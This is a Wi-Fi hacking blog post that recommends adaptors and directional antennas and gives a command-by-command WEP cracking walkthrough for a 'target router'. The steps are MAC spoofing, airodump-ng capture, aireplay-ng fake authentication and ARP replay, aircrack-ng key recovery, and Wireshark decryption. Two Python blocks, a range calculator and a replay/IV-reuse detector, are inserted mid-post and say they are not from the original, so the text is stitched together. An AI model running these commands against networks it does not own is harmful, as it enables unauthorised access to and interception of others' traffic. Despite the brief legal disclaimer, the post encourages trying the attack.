802.11 Network Security – Tools of the Trade
I thought, why not shed some light on the tools that I have been using to play with the Wi-Fi networks around me? Hopefully we can gather a collective discussion on what works and what does not, and perhaps some interesting ideas for future Wi-Fi projects.
Max Chee and I have been toying with 802.11 networks since early this year. We have tested and tried a number of antennas, network adaptors and certain methods to “crack” WEP and WPA. The objective is to decipher and read data that is up in the air.
For starters, here is a set of software/tools that I used.
OS: Backtrack 4, Ubuntu 10.04.
Tools: Aircrack-NG suite, Wireshark & WiFiZoo
Wireshark and WiFiZoo are basically network packet analysers that help you make sense of the stream of data being fed to you in real time. Both have great GUIs, so I do not foresee any problems with using them, and both come pre-installed in Backtrack 4. What one should look out for is mastering the Aircrack-NG suite. Be aware that it ONLY works fully with certain Wi-Fi cards: some cards will not be detected by the Aircrack-NG suite at all, while others will have only partial functions available (a common example is being able to collect data passively but not inject packets into the air). So MAKE SURE you get a proper Wi-Fi adaptor card with the correct chipset before you begin cracking or sniffing. You can get the list of supported cards and chipsets here.
Adaptors & Antennas
This brings us to the fun part of adaptors and antennas, perhaps also the hardest and most rewarding part of all. To cut a long story short on the numerous hair-tearing sessions we had to go through finding the “Chosen One”, Max and I finally arrived at two commercially available adaptors that work perfectly with the Aircrack-NG suite: the AWUS036H and the UBDo-gt.
The reason for these two is simple: their chipset (RTL8187L) is supported and they are cost-effective for their specifications. The only difference between the two lies in the antenna. The AWUS036H comes with an omnidirectional antenna while the UBDo-gt comes with a directional antenna of 12 dBi gain.
The choice between an omnidirectional and a directional antenna matters in practice. One would use an omnidirectional antenna first when doing reconnaissance on the networks in the vicinity, and then a directional antenna to lock on to the target. Once you know where to point, you can move further away from the target without compromising signal strength and quality.
Unfortunately, directional antennas do not come cheap. Take the UBDo-gt for example: because of the antenna it costs about $30-40 SGD more than the AWUS036H, and standalone external antennas cost up to $70-90 SGD for about the same 12 dBi gain. The good news is that making your own antenna can be really cheap and simple. I have made a Cantenna on my own using a “Longan Fruit” can and it gives me about 8 – 12 dBi gain.
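The claim that a higher-gain antenna lets you sit further away is plain link-budget arithmetic, and the same arithmetic tells a network owner how far their AP's traffic can be received in the open. The following Python is an added example, not code from the original post: it uses the Friis free-space path loss with channel 6's centre frequency (2437 MHz), and the AP transmit power (20 dBm), AP antenna gain (2 dBi), low-gain omni (2 dBi) and receiver sensitivity (-85 dBm) are assumed figures chosen for the worked numbers, not values from the post.

```python
import math

# Centre frequency of 2.4 GHz channel 6 in MHz (the channel used in the post).
CHANNEL_6_MHZ = 2437.0

# Assumed figures for the worked numbers (not from the post): a consumer AP at 20 dBm
# through a 2 dBi stock antenna, and a receiver that still decodes frames at -85 dBm.
AP_TX_POWER_DBM = 20.0
AP_ANTENNA_DBI = 2.0
RX_SENSITIVITY_DBM = -85.0


def free_space_path_loss_db(distance_km: float, freq_mhz: float) -> float:
    """Friis free-space path loss: 20log10(d_km) + 20log10(f_MHz) + 32.44 dB."""
    if distance_km <= 0 or freq_mhz <= 0:
        raise ValueError("distance and frequency must be positive")
    return 20 * math.log10(distance_km) + 20 * math.log10(freq_mhz) + 32.44


def received_power_dbm(rx_antenna_dbi, distance_km, tx_power_dbm=AP_TX_POWER_DBM,
                       tx_antenna_dbi=AP_ANTENNA_DBI, freq_mhz=CHANNEL_6_MHZ):
    """Link budget: every dBi of receive antenna gain adds one dB of received signal."""
    return (tx_power_dbm + tx_antenna_dbi + rx_antenna_dbi
            - free_space_path_loss_db(distance_km, freq_mhz))


def max_range_km(rx_antenna_dbi, tx_power_dbm=AP_TX_POWER_DBM, tx_antenna_dbi=AP_ANTENNA_DBI,
                 rx_sensitivity_dbm=RX_SENSITIVITY_DBM, freq_mhz=CHANNEL_6_MHZ):
    """Largest free-space distance at which received power still meets the sensitivity floor."""
    budget_db = tx_power_dbm + tx_antenna_dbi + rx_antenna_dbi - rx_sensitivity_dbm
    # Invert the path-loss formula for distance: 20log10(d) = budget - 20log10(f) - 32.44.
    return 10 ** ((budget_db - 20 * math.log10(freq_mhz) - 32.44) / 20)


def range_multiplier(extra_gain_db: float) -> float:
    """Free-space range scales as 10^(gain/20): +6 dB doubles it, +10 dB gives about 3.16x."""
    return 10 ** (extra_gain_db / 20)


if __name__ == "__main__":
    for label, gain in (("low-gain omni (assumed 2 dBi)", 2.0), ("12 dBi directional", 12.0)):
        print(f"{label}: received at 100 m = {received_power_dbm(gain, 0.1):.1f} dBm, "
              f"free-space reach = {max_range_km(gain):.2f} km")
    print(f"going from 2 to 12 dBi multiplies reach by {range_multiplier(10):.2f}")
```

Free space is the optimistic case; walls and multipath shrink the real numbers, but the ratio holds: the 10 dB difference between a 2 dBi omni and the 12 dBi UBDo-gt antenna is worth roughly three times the distance, which is also why turning the AP's transmit power down is a cheap way to shrink the area in which its traffic can be collected.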
Basic steps to get you cracking WEP (for ScriptKiddies)
Once you have got your tools ready, it is time to get cracking. Routers, especially those given out by our local ISPs, have their default security settings set to WEP to encrypt their traffic. This can be cracked easily by the Aircrack-NG suite in about 5 minutes once you are “au fait” with the setup.
For those who want to jump straight into the cracking process here are the basic steps you need to take:
Step 0: Spoof MAC address
sudo ifconfig <attacker's wlan interface> hw ether <desired MAC address>
Step 1: Gather essential background data about yourself & your target
target_router SSID: target_router
target_router MAC address: 00:14:7F:99:EB:99
target router channel: 6
attacker’s MAC address: 00:0f:b5:ff:ff:f9
attacker’s wlan interface: wlan0
attacker’s monitoring interface name (spawned from wlan0): mon0
Note: Replace the above variables with your own. These were mine for my setup.
Step 2: Using Aircrack-NG suite to crack WEP
Spawn a monitoring interface with wlan0:
sudo airmon-ng start wlan0
Survey/scan for your target router:
sudo airodump-ng mon0
Stop the monitoring interface so that you can start it again to listen on channel 6:
sudo airmon-ng stop mon0
sudo airmon-ng start wlan0 6
Pump output into a file called "outputfile-01.cap":
sudo airodump-ng -c6 -w outputfile mon0
Send a fake authentication request (re-associating every 1 second) so that the AP accepts your frames and you can generate more IVs:
sudo aireplay-ng -1 1 -e target_router -a 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0
Launch ARP request replay to generate IV packets quickly:
sudo aireplay-ng -3 -b 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0
Finally, recover the key from the IVs collected in the capture file:
sudo aircrack-ng outputfile-01.cap
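The reason the steps above finish in minutes is WEP's 24-bit IV: there are only 16,777,216 keystreams per key, so a replay that pumps out thousands of frames per second forces reuse quickly, and that same traffic is loud enough to be noticed. The Python below is an added example, not code from the original post: it computes the expected IV collisions for a given frame count (birthday bound) and runs two simple wireless-IDS checks, IV reuse and replay bursts, over a constructed sample of per-frame metadata. The record layout (t, src, bssid, iv, fp) and the MAC addresses are this example's own assumptions; the "fp" field stands in for a hash of the encrypted frame body that a sensor would compute.

```python
from collections import defaultdict

WEP_IV_BITS = 24                     # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 2 ** WEP_IV_BITS          # only 16,777,216 distinct keystreams per key


def expected_iv_collisions(n_frames: int, iv_space: int = IV_SPACE) -> float:
    """Expected number of colliding IV pairs among n randomly chosen IVs (birthday bound)."""
    return n_frames * (n_frames - 1) / (2 * iv_space)


# Constructed sample of per-frame metadata as a monitoring sensor might record it.
# Field names are this example's own: t = seconds, src = transmitter MAC, bssid = AP,
# iv = WEP IV from the frame header, fp = short fingerprint (hash) of the encrypted body.
AP_BSSID = "02:00:00:aa:aa:aa"       # constructed, locally administered address
STATION = "02:00:00:00:00:01"        # constructed: a normal client
REPLAYER = "02:00:00:00:00:99"       # constructed: a station re-sending one captured frame


def _frame(t, src, iv, fp):
    return {"t": t, "src": src, "bssid": AP_BSSID, "iv": iv, "fp": fp}


SAMPLE_FRAMES = []
# Normal traffic: fresh IV and distinct body on every frame, one frame every half second.
for i in range(8):
    SAMPLE_FRAMES.append(_frame(0.5 * i, STATION, 0x000100 + i, f"body-{i}"))
# Busy networks wrap the IV counter, so a single reuse by a legitimate client is plausible.
SAMPLE_FRAMES.append(_frame(4.0, STATION, 0x000103, "body-8"))
# Replay burst: the same encrypted frame (same IV, same body) 30 times in just over half a second.
for i in range(30):
    SAMPLE_FRAMES.append(_frame(5.0 + 0.02 * i, REPLAYER, 0x0a0b0c, "arp-req-3f"))


def iv_reuse(frames):
    """Return {(bssid, iv): count} for every IV seen more than once under the same BSSID."""
    counts = defaultdict(int)
    for f in frames:
        counts[(f["bssid"], f["iv"])] += 1
    return {key: n for key, n in counts.items() if n > 1}


def replay_bursts(frames, window_s=1.0, threshold=20):
    """Flag stations that send an identical frame at least `threshold` times within `window_s`.

    Returns {src_mac: largest burst size}. A legitimate client retransmits a frame a handful
    of times at most; dozens of byte-identical data frames per second mark a replay.
    """
    times_by_key = defaultdict(list)
    for f in frames:
        times_by_key[(f["src"], f["fp"])].append(f["t"])
    alerts = {}
    for (src, _fp), times in times_by_key.items():
        times.sort()
        best, j = 0, 0
        for i in range(len(times)):            # sliding window over sorted timestamps
            while j < len(times) and times[j] - times[i] <= window_s:
                j += 1
            best = max(best, j - i)
        if best >= threshold:
            alerts[src] = max(alerts.get(src, 0), best)
    return alerts


if __name__ == "__main__":
    print("IV reuse:", iv_reuse(SAMPLE_FRAMES))
    print("replay bursts:", replay_bursts(SAMPLE_FRAMES))
    for n in (5_000, 40_000):
        print(f"expected IV collisions after {n} frames: {expected_iv_collisions(n):.2f}")
```

On the sample, the legitimate client trips the IV-reuse check once (count 2) while the replaying station produces one IV seen 30 times and a 30-frame burst inside a single second; a real sensor would feed the same two checks from monitor-mode captures. Note that IV reuse is built into WEP itself, so alerting on it only buys reaction time; the durable fix for the ISP routers mentioned above is to switch them off WEP altogether.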
Step 3 (Optional): Monitor network traffic in real-time
Open up Wireshark > Edit > Preferences > enter the WEP key into the appropriate fields.
Disclaimer: Unauthorised access to your neighbours’ network or any other network other than your own is an offence in Singapore. Crack at your own risk!
Finally, experiment as much as you can without getting into trouble with the law, because it is a fun process and it need not be a painful one. Please comment and leave your thoughts below. Let us know if you have a Wi-Fi project in mind that you want to try out or want to share. I look forward to your response.
Andre Ng, First Mate of Div0.